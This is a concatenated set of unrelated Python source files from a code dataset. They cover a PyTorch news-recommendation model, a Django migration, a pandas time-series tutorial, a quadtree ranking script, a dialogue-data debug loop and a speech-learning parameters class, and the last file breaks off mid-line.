self.fill_table(visible_communes)\n\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass\n","sub_path":"smc.py","file_name":"smc.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"365291595","text":"import torch\nfrom model.NRMS.news_encoder import NewsEncoder\nfrom model.NRMS.user_encoder import UserEncoder\nfrom model.general.click_predictor.dot_product import DotProductClickPredictor\n\n\nclass NRMS(torch.nn.Module):\n \"\"\"\n NRMS network.\n Input 1 + K candidate news and a list of user clicked news, produce the click probability.\n \"\"\"\n def __init__(self, config, pretrained_word_embedding=None, writer=None):\n super(NRMS, self).__init__()\n self.config = config\n self.news_encoder = NewsEncoder(config, pretrained_word_embedding)\n self.user_encoder = UserEncoder(config)\n self.click_predictor = DotProductClickPredictor()\n\n def forward(self, candidate_news, clicked_news):\n \"\"\"\n Args:\n candidate_news:\n [\n {\n \"title\": Tensor(batch_size) * num_words_title\n } * (1 + K)\n ]\n clicked_news:\n [\n {\n \"title\":Tensor(batch_size) * num_words_title\n } * num_clicked_news_a_user\n ]\n Returns:\n click_probability: batch_size, 1 + K\n \"\"\"\n # 1 + K, batch_size, word_embedding_dim\n candidate_news_vector = torch.stack(\n [self.news_encoder(x) for x in candidate_news])\n # batch_size, num_clicked_news_a_user, word_embedding_dim\n clicked_news_vector = torch.stack(\n [self.news_encoder(x) for x in clicked_news], dim=1)\n # batch_size, word_embedding_dim\n user_vector = self.user_encoder(clicked_news_vector)\n # batch_size, 1 + K\n click_probability = torch.stack([\n self.click_predictor(x, user_vector) for x in candidate_news_vector\n ],\n dim=1)\n return click_probability\n\n def get_news_vector(self, news):\n \"\"\"\n Args:\n news:\n {\n \"title\": Tensor(batch_size) * num_words_title\n },\n Returns:\n (shape) batch_size, word_embedding_dim\n \"\"\"\n # batch_size, word_embedding_dim\n return self.news_encoder(news)\n\n def get_user_vector(self, clicked_news_vector):\n \"\"\"\n Args:\n clicked_news_vector: batch_size, num_clicked_news_a_user, word_embedding_dim\n Returns:\n (shape) batch_size, word_embedding_dim\n \"\"\"\n # batch_size, word_embedding_dim\n return self.user_encoder(clicked_news_vector)\n\n def get_prediction(self, news_vector, user_vector):\n \"\"\"\n Args:\n news_vector: word_embedding_dim\n user_vector: word_embedding_dim\n Returns:\n click_probability: 0-dim tensor\n \"\"\"\n # 0-dim tensor\n click_probability = self.click_predictor(\n news_vector.unsqueeze(dim=0),\n user_vector.unsqueeze(dim=0)).squeeze(dim=0)\n return click_probability\n","sub_path":"src/model/NRMS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59684124","text":"'''\n\nThis program is to show quality preferences when extra data\nabout the quality of neighbourhood is available\n\n'''\nfrom pyqtree import Index\n\n\nclass Dataset:\n def getType(self,type):\n \tif(type == 0):\n \t\treturn 'feature'\n \telif(type == 1):\n \t\treturn 'star'\n \telif(type == 2):\n \t\treturn 'box'\n\n def __init__(self, id, x, y, type, quality):\n self.id = id\n self.bbox = (x, y, x, y)\n self.type = self.getType(type)\n self.quality = quality\n\n\n\n\nindex = Index(bbox=(0, 0, 80, 80))\n\np = [[0] * 2] * 2\nq = []\nk = 0\n\ni1 = i2 = 0\n\n# insert main data points\nfor i in range(20, 81, 40):\n for j in range(20, 81, 40):\n # p[i1][i2] = Dataset(k, i, j, 0)\n # q.append(p[i1][i2])\n temp = Dataset(k,i,j,0,0)\n # print(str(temp.id))\n # print(str(temp.bbox[0])+' '+str(temp.bbox[1]))\n q.append(temp)\n # print(str(i1)+'-'+str(i2)+' '+str(k)+' '+str(i)+' '+str(j))\n k += 1\n # index.insert(p[i1][i2], p[i1][i2].bbox)\n index.insert(temp, temp.bbox)\n i2 += 1\n i1 += 1\n i2 = 0\n\n# for i in range(0,4):\n# \tprint(str(q[i].id)+' '+str(q[i].bbox[0])+' '+str(q[i].bbox[1]))\n\n# set of star features\nx = [] * 6\nx.append(Dataset(4, 10, 70, 1,2))\nx.append(Dataset(5, 30, 70, 1,5))\nx.append(Dataset(10, 10, 30, 1,4))\nx.append(Dataset(11, 30, 30, 1,8))\nx.append(Dataset(12, 10, 10, 1,3))\nx.append(Dataset(13, 50, 30, 1,6))\n\n# insert x points\nfor i in range(0, 6):\n index.insert(x[i], (x[i]).bbox)\n\n# set of round features\ny = [] * 6\ny.append(Dataset(6, 10, 50, 2,3))\ny.append(Dataset(7, 50, 70, 2,5))\ny.append(Dataset(8, 70, 70, 2,1))\ny.append(Dataset(9, 70, 50, 2,4))\ny.append(Dataset(14, 70, 30, 2,2))\ny.append(Dataset(15, 70, 10, 2,7))\n\n# insert y points\nfor i in range(0, 6):\n index.insert(y[i], (y[i]).bbox)\n\n# overlap regions\no9 = (0, 0, 80, 80)\no1 = (0, 20, 40, 60)\no2 = (40, 20, 80, 80)\no = (0, 0, 80, 80)\n\n# matches = index.intersect(o)\n\n# matches = sorted(matches, key=lambda x: x.id)\n\n# scrap out type 0 points\n#for i in range(0,3):\n#\tprint('p('+i+')'+'\\t')\nneighbourhood_quality = []\n\nfor i in range(0,4):\n\n\tmax_star = 0\n\tmax_box = 0\n\t# print(str(i)+' '+str(q[i].id)+str(q[i].bbox[0]) + ',' + str(q[i].bbox[1]) + ')')\n\tprint('\\nfeature'+str(i)+' ('+str(q[i].bbox[0])+','+str(q[i].bbox[1])+') neighbours ---> ' )\n\tminx = q[i].bbox[0] - 20\n\tminy = q[i].bbox[1] - 20\n\tmaxx = q[i].bbox[0] + 20\n\tmaxy = q[i].bbox[1] + 20\n\toverlapbbox = (minx, miny, maxx, maxy)\n\tmatches = index.intersect(overlapbbox)\n\t# find neighbours\n\t# for match in matches:\n\t# \tprint(str(match.id)+' '+str(match.type))\n\n\tprint(\"filtering self....\")\n\t# filter ownself\n\tprint('ID'+'\\t'+'Type'+'\\t'+'Quality')\n\tfor match in matches:\n\t\tif(match.id != i):\n\t\t\tprint(str(match.id)+'\\t'+str(match.type)+'\\t'+str(match.quality))\n\t\t\tif(match.type == 'star'):\n\t\t\t\tif(match.quality > max_star):\n\t\t\t\t\tmax_star = match.quality\n\t\t\telse:\n\t\t\t\tif(match.quality > max_box):\n\t\t\t\t\tmax_box = match.quality\n\tquality = max_box + max_star\n\tneighbourhood_quality.append((i,quality))\n\nranking = sorted(neighbourhood_quality, key=lambda x: x[1], reverse=True)\n\nprint('\\nFinal ranking (based on sum of feature quality)...\\n')\nprint('Feature'+'\\t'+'Rank')\nfor rank in ranking:\n\tprint(str(rank[0])+'\\t'+str(rank[1]))\t\n\n\n# for i in matches:\n# print('p' + str(i.id) + ' --> (' +\n# str(i.bbox[0]) + ',' + str(i.bbox[1]) + ')')\n","sub_path":"python/qt4.py","file_name":"qt4.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"551704013","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nimport uuidfield.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('product', '0011_auto_20150130_1049'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='uuid',\n field=uuidfield.fields.UUIDField(default='f1d5s3f5ds4fds', unique=True, max_length=32, editable=False, blank=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='product',\n name='page_view',\n field=models.IntegerField(default=493, null=True, verbose_name='\\u67e5\\u770b\\u6570', blank=True),\n ),\n migrations.AlterField(\n model_name='product',\n name='start_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 1, 30, 11, 42, 36, 865000), null=True, verbose_name='\\u5f00\\u59cb\\u65f6\\u95f4', blank=True),\n ),\n ]\n","sub_path":"product/migrations/0012_auto_20150130_1143.py","file_name":"0012_auto_20150130_1143.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"147052618","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport torch.utils.data\r\nimport models\r\nimport dataloader\r\nimport utils \r\nimport dict as dic\r\n\r\nimport os, sys\r\nimport argparse\r\nimport time\r\nimport math\r\nimport json\r\nimport collections\r\n\r\nfrom collections import defaultdict\r\n#config\r\nparser = argparse.ArgumentParser(description='predict.py')\r\nparser.add_argument('-config', default='config.yaml', type=str,\r\n help=\"config file\")\r\nparser.add_argument('-gpus', default=[0], nargs='+', type=int,\r\n help=\"Use CUDA on the listed devices.\")\r\nparser.add_argument('-restore', default='data/log/norml_mwNestedNOND128NOsaA1FNN/checkpoint.pt', type=str,\r\n help=\"restore checkpoint\")\r\nparser.add_argument('-seed', type=int, default=1234,\r\n help=\"Random seed\")\r\nparser.add_argument('-model', default='seq2seq', type=str,\r\n help=\"Model selection\")\r\nparser.add_argument('-score', default='', type=str,\r\n help=\"score_fn\")\r\nparser.add_argument('-pretrain', action='store_true',\r\n help=\"load pretrain embedding\")\r\nparser.add_argument('-limit', type=int, default=0,\r\n help=\"data limit\")\r\nparser.add_argument('-log', default='predict', type=str,\r\n help=\"log directory\")\r\nparser.add_argument('-unk', action='store_true',\r\n help=\"replace unk\")\r\nparser.add_argument('-memory', action='store_true',\r\n help=\"memory efficiency\")\r\nparser.add_argument('-beam_size', type=int, default=1,\r\n help=\"beam search size\")\r\n\r\nopt = parser.parse_args([])\r\nconfig = utils.read_config(opt.config)\r\ntorch.manual_seed(opt.seed)\r\n\r\n# pap ---------\r\nfrom pprint import pprint\r\n#--------\r\n\r\n#data\r\nprint('loading data...\\n')\r\nstart_time = time.time()\r\ndatas = torch.load(config.data)\r\nprint('loading time cost: %.3f' % (time.time()-start_time))\r\n\r\ntestset = datas['test'] # other possible values 'train' and 'valid'\r\nsrc_vocab, tgt_vocab = datas['dicts']['src'], datas['dicts']['src']\r\ntestloader = dataloader.get_loader(testset, batch_size=1, shuffle=False, num_workers=2)\r\nprint(type(testloader))\r\n# for elem in testloader :\r\n# \tprint(elem)\r\n# \tprint(type(elem))\r\n# \tprint(len(elem))\r\n# \tprint(elem[1])\r\n# \tsys.exit()\r\n# pap -----------\r\n# here for both (which it is normal because of the lines above) I get the\r\n# same output as for reading the dictionary with test_read_comernet_dics_save_data_tgt.py\r\n#pprint( src_vocab )\r\n# pprint( tgt_vocab )\r\ninverse_src_vocab = {}\r\nfor k,v in src_vocab.items():\r\n inverse_src_vocab[ v ] = k\r\n#---------- \r\ninverse_tgt_vocab = {}\r\nfor k,v in tgt_vocab.items():\r\n inverse_tgt_vocab[ v ] = k\r\n#---------- \r\n\r\nd = 0\r\nfor src1, src1_len, src2,src2_len, src3, src3_len, tgt, tgt_len,tgtv, tgtv_len,tgtpv, tgtpv_len in testloader:\r\n # pap ----------\r\n print( '______________\\n\\n' )\r\n print( 'dialog d={0}=================='.format( d ))\r\n pprint( src1_len )\r\n print( '______________\\nUSER\\n' )\r\n for i, s in enumerate( src1 ):\r\n # print( s.dim() )\r\n # print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n # print( msg )\r\n d += 1\r\n print( '______________\\n system\\n' )\r\n for i, s in enumerate( src2 ):\r\n # print( s.dim() )\r\n # print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n # print( msg )\r\n d += 1\r\n print( '______________\\ndst\\n' )\r\n for i, s in enumerate( src3 ):\r\n # print( s.dim() )\r\n print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1 \r\n #----------- \r\n print(f'{tgt}, len = {len(tgt)}, type = {type(tgt)}')\r\n for i, s in enumerate(tgt):\r\n # print( s.dim() )\r\n print( 's size is {0}'.format( s.size()))\r\n turn_nbr, max_token = s.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ s[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1\r\n\r\n print( '______________\\n system\\n' )\r\n # print(tgtv)\r\n\r\n for i, s in enumerate(tgtv):\r\n for j,v in enumerate(s):\r\n print( 'v size is {0}'.format( v.size()))\r\n turn_nbr, max_token = v.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ v[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1 \r\n \r\n for i, s in enumerate(tgtpv):\r\n for j,v in enumerate(s):\r\n for k, vv in enumerate(v):\r\n print( 'vv size is {0}'.format( vv.size()))\r\n turn_nbr, max_token = vv.size()\r\n for turn_idx in range( 0, turn_nbr ):\r\n msg = ''\r\n for tok_idx in range( 0, max_token ):\r\n # print( s[ turn_idx ][ tok_idx ] )\r\n # print( s[ turn_idx ][ tok_idx ].item() )\r\n msg += '{0} '.format( inverse_src_vocab[ vv[ turn_idx ][ tok_idx ].item() ] )\r\n print( msg )\r\n d += 1\r\n sys.exit() \r\n #----------- \r\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"171224003","text":"import numpy as np \nimport matplotlib.pyplot as plt \n \n\n# 随机点输入\nX = [19,25,31,38,44] \nY = [19.0,32.3,49.0,73.3,97.8]\nplt.plot(X, Y, 'ro') \nplt.show()\n####\n\n# 生成系数矩阵A \ndef gen_coefficient_matrix(X, Y): \n N = len(X) \n m = 3\n A = []\n \n for i in range(m):\n a = []\n b=0\n for j in range(m):\n b= b + X[i] ** (i+j)\n a.append(b)\n A.append(a)\n return A \n \n# 计算方程组的右端向量b \ndef gen_right_vector(X, Y): \n N = len(X) \n m = 3\n b = []\n c = 0\n for i in range(m):\n c = c + X[i]**i*Y[i]\n b.append(c) \n return b \n \nA = gen_coefficient_matrix(X, Y) \nb = gen_right_vector(X, Y) \n \na0, a1, a2 = np.linalg.solve(A, b)\n\n####\n\n# 生成拟合曲线的绘制点\nN = len(X) - 1\nR = X[N]\n_X = [0, R] \n_Y = [a0 + a1*x + a2*x**2 for x in _X]\nplt.plot(X, Y, 'ro', _X, _Y, 'b', linewidth=2) \nplt.title(\"y = {} + {}x + {}$x^2$ \".format(a0, a1, a2)) \nplt.show()\n\n","sub_path":"计算方法所有程序/第四章编程/最小二乘拟合 二次函数(不可用).py","file_name":"最小二乘拟合 二次函数(不可用).py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"258230045","text":"health = 100\nbitcoins = 0\nhave_died = False\ndungeon_rooms = input().split(\"|\")\ncounter = 0\n\nfor room in dungeon_rooms:\n counter += 1\n action,value = room.split(\" \")\n value = int(value)\n if action == \"potion\":\n if health + value > 100:\n diff = health + value - 100\n value -= diff\n health += value\n else:\n health += value\n print(f\"You healed for {value} hp.\")\n print(f\"Current health: {health} hp.\")\n elif action == \"chest\":\n bitcoins += value\n print(f\"You found {value} bitcoins.\")\n else:\n if health - value > 0:\n health -= value\n print(f\"You slayed {action}.\")\n else:\n print(f\"You died! Killed by {action}.\")\n print(f\"Best room: {counter}\")\n have_died = True\n break\nif not have_died:\n print(f\"You've made it!\\nBitcoins: {bitcoins}\\nHealth: {health}\")\n\n","sub_path":"exercises/Mu Online.py","file_name":"Mu Online.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"335196654","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import Series, DataFrame\nfrom datetime import datetime\n'''\nCreated on April , 2015\n@author: stevey\n@python love love love, you can make your best.!!\n'''\n\nnow = datetime.now()\n# print(now)\nprint(now.year, now.month, now.day)\n\n# delta\ndelta = now - datetime(2013, 3, 1)\nprint(delta)\n\n\nfrom datetime import timedelta\nstart = datetime(2008, 8, 28)\nprint(start + timedelta(12)) # default: days\n\n\n# delta 是一个时间间隔对象 可以与现有的datetime 进行 + - 运算\n\n# string 与 datetime 之间的转换\n\nstamp = datetime(2011, 3, 1)\nstring_stamp = str(stamp)\nprint(string_stamp)\n# print(type(string_stamp))# str\n\nstr_ = '2013-03-01'\nstr2date = datetime.strptime(str_, '%Y-%m-%d')\nprint(str2date)\n\n# 对于已知格式的字符串(日期), 用datetime的strptime方法是比较方便的方式转换.\n\n# 利用第三方的dateutil包 parse方法 能识别大多数常规的日期格式\n\nfrom dateutil.parser import parse\n_ = parse('2011-3-1')\nprint(_, type(_))\n\n_ = parse('6/12/2013')\nprint(_, type(_))\n\n_ = parse('5/6/2011', dayfirst=True)\nprint(_, type(_))\n\n\n_ = parse('Jan 31, 1977 10:45 PM')\nprint(_, type(_))\n\n# 在pandas中 也提供了 to_datetime方法 对字符串进行快速的解析, 格式转换\n\ndatestrs = ['7/6/2011', '1/3/2014']\nprint(pd.to_datetime(datestrs))\nprint(pd.to_datetime(datestrs + [None]))\n# NaT (Not a Time) is a pandas NA value for timestamp data.\n\n\"***********************************************************\"\nprint(\"***********************************************************\")\n# Time Series Basic\n# 用datetime 生成的日期对象可以作为 index\nfrom datetime import datetime\ndates = [datetime(2011,1,1), datetime(2011,1,2), datetime(2011,1,3)\n,datetime(2011,1,5), datetime(2011,1,7), datetime(2011,1,9)]\nts = Series(np.random.randn(6), index=dates)\nprint(ts)\nprint(type(ts))\n# 拥有datetime 作索引的结构为TimeSeries类型\n\n# 对于更长的日期, 索引向量能用更简单的方式来生成.\nlonger_ts = Series(np.random.randn(1000), index=pd.date_range('2013-03-01', periods=1000))\nprint(longer_ts)\nprint(\"***********************************************************\")\nprint(longer_ts['2013-05'])\n\n# 对 timeseries 截取\nprint(longer_ts.truncate(after='2013-04-01'))\n\n\n# generating date ranges\nindex_help = '''\npd.date_range() 方法 具有很多不同的参数, 便于生成date ranges\n1. date_range('4/1/2012', '6/1/2012')\n2. date_range(start='4/1/2012', periods=20)\n3. date_range(end='6/1/2012', periods=20)\n4. date_range('1/1/2000', '12/1/2000', freq='BM)\nBM 表示 business end of month\n'''\n# Hour Minute 对象\n\nfrom pandas.tseries.offsets import Hour, Minute\nhour = Hour(4)\nprint(hour)\n# 时间的 hour, minute 可以在一起计算\nprint(hour + Minute(30))\n\n# Shifting(Leading and Laging) Data\nts = Series(np.random.randn(4), index=pd.date_range('1/1/2000', periods=4,freq='M'))\n# 原数据 1月-> 4月, 向后偏移2个freq, 得到 3月-6月\nprint(ts.shift(2, freq='M'))\n\n\n#>> Time Zone Handling\nimport pytz\nprint(pytz.common_timezones[-5:])\nprint(pytz.timezone('US/Eastern'))\n\n# Localization and Conversion\n# 默认情况下 time series Pandas下 是对时区采取 naive 处理的.\n\nrng = pd.date_range('3/9/2012 9:30', periods=6, freq='D')\nts = Series(np.random.randn(len(rng)), index=rng)\n# tz 还没定义\nprint(ts.index.tz)\nprint(pd.date_range('3/9/2012 9:30', periods=10, freq='D', tz='UTC'))\n# ts = Series(np.random.randn(len(rng)), index=rng)\nts_utc = ts.tz_localize('UTC')\nprint(ts_utc)\n\n\n# Time Series Plotting\n\n\n\n","sub_path":"time-series/ts1.py","file_name":"ts1.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"438352764","text":"\n# Global imports\nimport numpy\n\n\n\n\nclass parameters(object):\n\t\"\"\"\n\tThe idea is to keep all control parameters here, - Thus, results can be reproduced in a neat way.\n\tWarning: Before introducing new parameters, make sure that the name is not yet used (e.g. in a\n\tfunction executed before.)\n\tIf you want to use one variable for two things, you might consider using a dictionary / class structure.\n\t\n\tAdapting this project's code for your purposes will definitely mean changing the code itself (under src/.../).\n\tHowever, try to understand first, how you can control the ambient speech production, the hearing and the training from\n\tthis script first, before making changes to the code.\n\t\n\tI tried to document most of these control parameters in this script. However, a future user won't completely understand\n\ttheir use, unless he/she double checks in the relevant scripts. For instance, in the subfunction of parameters: get_..\n\t_ambient_speech_params(self) (just a few lines down), all the control parameters for the first stage of the project are\n\tlisted (namely control parameters for ambient_speech).\n\tIn order to understand what, say, the self.sampling_null dictionary does, go to the script 'ambient_speech_functions.py',\n\tlocated in the src folder, and search for self.sampling_null. The context of the code will often make things more clear\n\tand you won't be in danger of not really knowing what your changing when you change a control parameter.\n\t\"\"\"\n\t\n\t\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Shared Parameters used in 'ambient_speech', 'hear' and 'learn' (and subfunctions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t\n\t\t\n\t\t\t#Special result sub-folders?\n\t\tself.subfolder = {'hear':'','learn':''} #format : \"xxxx/\"\n\t\t\t#Provide explaining output?\n\t\tself.be_verbose_in = {'hear':False,'learn':True} #Verbosity anyway True in ambient speech.\n\t\t\n\t\t\n\t\t# Temporary solution. 'hear' and 'learn' have aspects that can be done in parallel (using MPI for python, i.e.)\n\t\t# For now, we only have one worker, who's rank is 0 (master). Slave workers would have ranks 1,2,3...\n\t\tself.n_workers = 1\n\t\tself.rank = 0\n\t\t\n\t\t\n\t\t# Which main steps shall we do?\n\t\t# Here, we tell our project shell in the main directory what do actually do.\n\t\tself.execute_main_script = {'ambient_speech':False,'hear':False,'learn':True,'shell_analysis':False}\n\t\t\n\t\n\t\n\t\n\t\n\t\n\tdef get_ambient_speech_params(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Parameters that are used in 'ambient_speech' (and functions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t# Jobs to be executed when calling ambient_speech.py.\n\t\t\t# Warning: Executing a job will generally delete data from the last time that job was performed!\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t\t#Setup (directories, fundamental frequencies, glottal parameters in speaker files, etc.)\n\t\tself.do_setup = True\n\t\t\t#Synthesize? Shall the gestures included in the speakerfiles be synthesized? (These must first be set in VTL!) A VTL library is called, and airflow simulated. > .wav file produced\n\t\t\t#These wav files are used as prototypes of that specific gesture sound. (see \"learn\")\n\t\tself.do_make_proto = False\n\t\t\t#Shall those set-up speakers and their synthesized gestures (.wav files) be analyzed (formants, parameter developement of shapes over years e.g.)?\n\t\tself.do_setup_analysis = False\n\t\t\t#Shall speech samples (used to train the auditory system) be produced? (Takes a lot of time, depending on how many samples are produced..)\n\t\tself.do_make_samples = False\n\t\t\t#Shall the user be given the chance to change classifications? Make a backup of the samples, before executing this..\n\t\tself.do_user_check = False\n\t\t\t#Shall those speech samples be analysed? (Look at formants of good samples vs bad samples (meaning (non-) or representative)? )\n\t\tself.do_sample_analysis = False # Ideally do the sample analysis after the user check.\n\n\t\t# Important note:\n\t\t# Might need to install plotly library for analysis features\n\t\t# Additionally, in Ubuntu 16.04 the praat formants module doesn't seem to work anymore. > Either try debugging (I already tried..), or implement your\n\t\t# own formant extraction method. (Burg's method for instance). (Simply google Burg's formant extraction).\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t# The name of the speaker group. This requires that a certain speaker group already be setup (as VTL '.speaker' files) in the right directory (data/speakers_gestures/\"speaker_group\")\n\t\t# Ambient speech will be generated using some or all of these speakers (self.speakers = \"all\" / self.speakers = [2,5,3] for example).\n\t\t# Speakers are named with integers. (See speaker group documentation in srangefm group).\n\t\t# In order to work, these speakers (of various ages) must have a file called _file_age.txt in the speaker directory, where filename and age and gender are listed in the\n\t\t# same format as in srangefm. Only then, can 'ambient_speech' read the ages and genders etc.\n\t\tself.sp_group_name = 'srangefm_2'\n\t\n\t\t# The size of the speaker group (not necessarily how many speakers are chosen from that group!) (You could also just read this parameter out of the speaker age file)\n\t\tself.size = 22\n\t\n\t\t# The shape gestures we want to look at..\n\t\tself.vowels=['a','i','u']#\"all\"\n\t\n\t\t# The speakers in the speaker group we want to look at.. If you want the whole speaker group, simply put \"all\".\n\t\tself.speakers=\"all\"\n\t\t\n\t\t# F0-parameters:\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t# Various F0-parameters can be used for each speaker. Chose which one.. (must be 1 parameter for each speaker)\n\t\t# Real parts: Male, Imag parts: Female. This format makes sense for speakers where we have one male and one female for each age!\n\t\t\t# Standard f0s, originally used in \"srangefm\".\n\t\tf0s_standard = numpy.array([505.202393494200, 355.126913609294, 293.202429182816, 274.930607250920 , 267.403576928634 , 262.018639542581 ,253.342004157396 , 239.229107613903 , 221.338079761552 ,201.538876040741 , 181.701451891867]) + 1j* numpy.array([505.148497150820, 355.220897386812 , 292.548958250982 ,274.320068337208 , 268.628877776761 , 266.442538954839 ,261.729637743741 , 252.139959167463 , 239.579141365103 ,226.189890942510 , 214.114914505535])\n\t\t\n\t\t\t# F0s taken from a Lee et al.\n\t\tf0s_Lee = \tnumpy.array([505.,355.,293.,270.,268.,250.,235.,175.,135.,140.,140.]) + 1j* numpy.array([505.,355.,292.,271.,268.,250.,236.,237.,230.,240.,235.])\n\n\t\tself.f0s = f0s_Lee\n\t\t\n\t\t# Correct pitch slightly to yield right frequencies. (problem in VTL_API?)\n\t\tself.pitch_corr = -1.0\n\t\t\n\t\t\n\t\t# Introduce some noise in the f0?\n\t\tself.f0_sigma = 0\n\t\n\t\n\t\t# Parameters used in sampling: (null are the non-representative null samples > train audit. system to classify those as not-syllables!)\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t\t# speech samples for each vowel for each speaker.\n\t\t\t# noise-sigma for the shape parameters > speech samples that are true vowel sounds or not representative (higher sigma)\n\t\t\t# larger noise-sigma for shape parameters > speech samples that shouldn't represent true vowel sounds\n\t\tself.sampling = \t {'n_samples':12, # roughly 100 samples per cathegory required for good training..\n\t\t\t\t\t\t\t\t\t'sigma':0.01, # Sigma used for most vowels. With vowel /u/, sigma will be reduced thus: sigma_u = sigma * 0.7\n\t\t\t\t\t\t\t\t\t'process sound':True, \n\t\t\t\t\t\t\t\t\t'n_channels':50,\n\t\t\t\t\t\t\t\t\t'compressed':True}\n\n\t\tself.sampling_null = {'n_samples':4, # The amount of null sampling of each vowel must add up to the amount of sampling for one vowel in total. \n\t\t\t\t\t\t\t\t\t\t\t # That way, we have for instance 100 (a good number for training) /a/ samples, 100 /e/ samples and 100 null samples.\n\t\t\t\t\t\t\t\t\t'sigma':0.2 , # Sigma used for most vowels. With vowel /u/, sigma will be reduced thus: sigma_u = sigma * 0.7\n\t\t\t\t\t\t\t\t\t'process sound':True, \n\t\t\t\t\t\t\t\t\t'n_channels':50, \n\t\t\t\t\t\t\t\t\t'compressed':True}\n\t\t\n\t\n\t\t# ===============================================================================================================\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\n\tdef get_hear_params(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Parameters that are used in 'hear' (and functions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t# Jobs to be done..?\n\t\t\t\t#Compare leaky networks with non-leaky networks?\n\t\t\t\t#If false, only compute leaky networks.\n\t\tself.do_compare_leaky = False\n\t\t\t\t#Turns plotting on\n\t\tself.do_plot_hearing = True\n\t\t\t\t#After chosing a final output ESN, analyze it (thresholds for later rewards e.g.) ?\n\t\tself.do_analyze_output_ESN = False # Not yet implemented!\n\t\t\t\t#Analyze partially trained ESNs? (not including all speakers in the data)\n\t\t\n\t\n\t\n\t\n\t\t# Network parameters\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t\t#Network sizes for variation ... default: [10,100,100]\n\t\tself.reservoir_sizes = [1000]\n\t\t\t#Number of simulations per worker. [default: 1]\n\t\tself.trains_per_worker = 1\n\t\t\t#Leak rate of leaky reservoir neurons. [default: 0.4]\n\t\tself.leak_rate = 0.4\n\t\t\t#Spectral radius of leaky reservoir. [default: 0.9]\n\t\tself.spectral_radius = 0.9\n\t\t\t#Regularization parameter. [default: 0.001]\n\t\tself.regularization = 